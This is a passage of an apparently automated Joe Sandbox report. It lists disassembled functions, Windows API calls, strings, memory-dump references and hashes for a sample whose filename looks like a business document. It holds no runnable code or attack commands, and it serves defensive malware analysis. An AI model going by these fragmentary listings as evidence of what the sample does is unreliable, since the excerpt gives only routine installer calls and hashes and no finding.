                                                                                                                                                                                                                          • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                                                                                                                                                                                          Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                                                                          • MulDiv.KERNEL32(000B785F,00000064,000B7863), ref: 00402BC5
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          • Opcode ID: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                                                                                                                                                                                          • Instruction ID: 2606314667324be55f41e30219fef3bc9394611b5aff82d746d43452e3b9cc2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901FF71540208BBEF109F60DD0AFEE3BB9EB04305F008039FA16B51E1D7B9A955DB59
                                                                                                                                                                                                                          Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID: Times New Roman
                                                                                                                                                                                                                          • API String ID: 3808545654-927190056
                                                                                                                                                                                                                          • Opcode ID: 6bec9a2abdc56632da7d0740e7f6f138e4a91470b18e8a3634b12b1290a7e22f
                                                                                                                                                                                                                          • Instruction ID: 9e7a7182ae9254896fc63aeedc32ca6a3ce3e3ef4d7c41cc1e10fd7b3e73fcff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bec9a2abdc56632da7d0740e7f6f138e4a91470b18e8a3634b12b1290a7e22f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59016232944340AFE7016B70AE5EBA93FA89795305F10C475F201B62E2C57801569F7F
                                                                                                                                                                                                                          Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          • Opcode ID: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                                                                                                                                                                                          • Instruction ID: c72a82ba9ad54cd79da2f6af8e35d97bfd0db4c8549b0f23667d21b619a0d1b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E215C71C01124BBCF216FA5DE89EAEBA79EF05324F10423AF910762E1C7794D418FA9
                                                                                                                                                                                                                          Function 004046D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Hil Setup: Installing,Hil Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,Hil Setup: Installing), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s$Hil Setup: Installing
                                                                                                                                                                                                                          • API String ID: 3540041739-4180361894
                                                                                                                                                                                                                          • Opcode ID: 2b6db2efeb45799232ee365156f5e9baf832e20e44c3c7b83ee9da5c9a5b6279
                                                                                                                                                                                                                          • Instruction ID: fde7fbcda73e06f71546803af61accc205d2577e4f834e35a140aa318663f7c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6db2efeb45799232ee365156f5e9baf832e20e44c3c7b83ee9da5c9a5b6279
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411E773A0412877DB10666D9C45EAF3288DB86374F254237FA26F31D1EA788C1281F8
                                                                                                                                                                                                                          Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          • Opcode ID: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction ID: 77b923b5c768d409b2d5e956d577938eeee851e691c4f647a4d397fc18f4a02c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10113D71A00108BEDF229F90DE89DAE3B7DEB54349B504436FA01F10A0D775AE51DB69
                                                                                                                                                                                                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                                                                                                                                                                                          • Instruction ID: 593f524f0f56d60e1fc11a8a6bbc9e15f3312f291ea64c997066006724e53d58
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF03CB2A04114AFEB01ABE4DE88CAF77BCEB54301B004476F601F6190C7749D018B79
                                                                                                                                                                                                                          Function 00403942 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,00422F20), ref: 004039DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$1033$Hil Setup: Installing
                                                                                                                                                                                                                          • API String ID: 530164218-1801705394
                                                                                                                                                                                                                          • Opcode ID: 6138db2613e77f620c74338854ca73b5a1c568fa4742f92c97baade5a2b7d14d
                                                                                                                                                                                                                          • Instruction ID: 76705a7a5afea2c6a0eacb6801383c1eecc8e18f8899786da29e176716c049bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6138db2613e77f620c74338854ca73b5a1c568fa4742f92c97baade5a2b7d14d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5211F6F1B04611ABCB209F15DD80A737B6CEBC5716328823FE90167394C67D9E029AAC
                                                                                                                                                                                                                          Function 0040576F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405775
                                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040577E
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014), ref: 0040578F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                          • Opcode ID: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                                                                                                                                                                                          • Instruction ID: 023f7408ada8d5c1aeddc6a893877c5a2de12b35a8757b47b9c38e9f0213d55a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD0A972605A30BAE21237169C09E8B2A0CCF82308B148023F200B72A2C63C4D028BFE
                                                                                                                                                                                                                          Function 00405808 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                          • String ID: Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 3213498283-3192565651
                                                                                                                                                                                                                          • Opcode ID: d4b5890a5172656c1eb40fd441f0df9ff670fb177ebc071cda3f773123205e0b
                                                                                                                                                                                                                          • Instruction ID: f0cf7fef16a01abdff0357a417d67991075a73f1b1c62c496353d96dbab8e0e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b5890a5172656c1eb40fd441f0df9ff670fb177ebc071cda3f773123205e0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0F653904F91AAFB3272640C44B775B8CCB55350F04C47BEE80B62C2C67C4861CF9A
                                                                                                                                                                                                                          Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402DE2,?), ref: 00402C15
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                          • Opcode ID: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction ID: 2730d2a3776e1339b9346d87ab19af6b7380862a528adabe40aaf425641bd1fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F054B090A270ABD621BF20FE4C99F7B74E7447117124476F004B21A4C67898C1CBAC
                                                                                                                                                                                                                          Function 00404E8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
